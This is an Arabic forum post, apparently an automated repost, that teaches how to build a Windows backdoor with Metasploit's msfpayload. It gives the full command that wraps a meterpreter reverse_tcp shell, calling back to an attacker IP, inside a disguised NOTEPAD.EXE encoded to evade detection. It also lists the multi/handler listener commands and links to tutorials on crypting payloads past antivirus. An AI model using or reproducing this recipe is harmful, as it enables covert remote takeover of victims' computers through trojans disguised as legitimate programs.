حالة الموضوع:
مغلق
  1. .:: RSS ::.

    .:: RSS ::. عضوية آلية

    الأنتساب:
    ‏9 سبتمبر 2011
    المشاركات:
    14,005
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    36
    الإقامة:
    IQ-T34M
    بسم الله الرحمن الرحيم


    نبذة بسيطة عن طريقة عمل msfpayload لـصنع backdoor exe


    \
    /
    \
    /


    لتشغيل الاداة نطبق الأمر msfpayload

    [​IMG]


    -------------------


    طريقة العمل :

    [​IMG]


    الأمر المستخدم :


    [email protected]:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.92 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/NOTEPAD.EXE -o /root/Desktop/NOTEPAD2.EXE


    اجزاء مهم من الامر لزم نتعرف عليها ..

    msfpayload هو أمر تشغيل الاداة

    windows/meterpreter/reverse_tcp مسار ونوع الشل المستخدم

    LHOST=192.168.8.92 عنوان المستخدم ( attacker ip )

    LPORT=443 عنوان البورت ( port )


    -t exe -x /root/Desktop/NOTEPAD.EXE -o /root/Desktop/NOTEPAD2.EXE


    نوع صيغة الملف والي هي EXE أسم الملف ومسار تخزين او حفظه /root/Desktop/NOTEPAD2.EXE


    تم تكوين NOTEPAD.EXE بنجاح ..


    ------------------------


    * عملية التصنت أو بالاصح handler


    طريق عمل handler بسيطه جـدا

    [​IMG]


    الاوامر المستخدمة :

    msf > use exploit/multi/handler

    msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp

    msf exploit(handler) > set LHOST 192.168.8.92
    LHOST => 192.168.8.92

    msf exploit(handler) > set LPORT 443 LPORT => 443
    LPORT => 443

    msf exploit(handler) > exploit


    نتعرف على الاوامر بشكل سريع :


    use exploit/multi/handler لستخدام الـ handler

    set PAYLOAD windows/meterpreter/reverse_tcp لظبط الشل

    set LHOST 192.168.8.92 لظبط الايبي

    set LPORT 443 LPORT => 443 لظبط البورت

    exploit تنقيذ

    ----------------------


    الان نفتح ملف NOTEPAD.EXE


    [​IMG]


    تم الأستغلال بنجاح ..



    ---------------------------------------------------------------


    شــروحات عامـة ( video )


    شرح طريقة الاختراق بواسطة ip خارجي من خوينا الأيماراتي j0k3rr :

    أظغط هنا



    شرح استعمال ( no-ip )

    أظغط هنا



    شرح طريقة التشفير بواسطة ( Vanish Script )

    أظغط هنا



    شرح طريقة التفشير عن كاسبر سكاي 2012

    أظغط هنا



    شرح التفشير بـأستخدام أداة PEscrambler

    أظغط هنا



    شرح للي مافهم 1 |11|

    اظغط هنا



    شرح للي مافهم 2 |11|
    اظغط هنا



    دعواتكم ,,
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة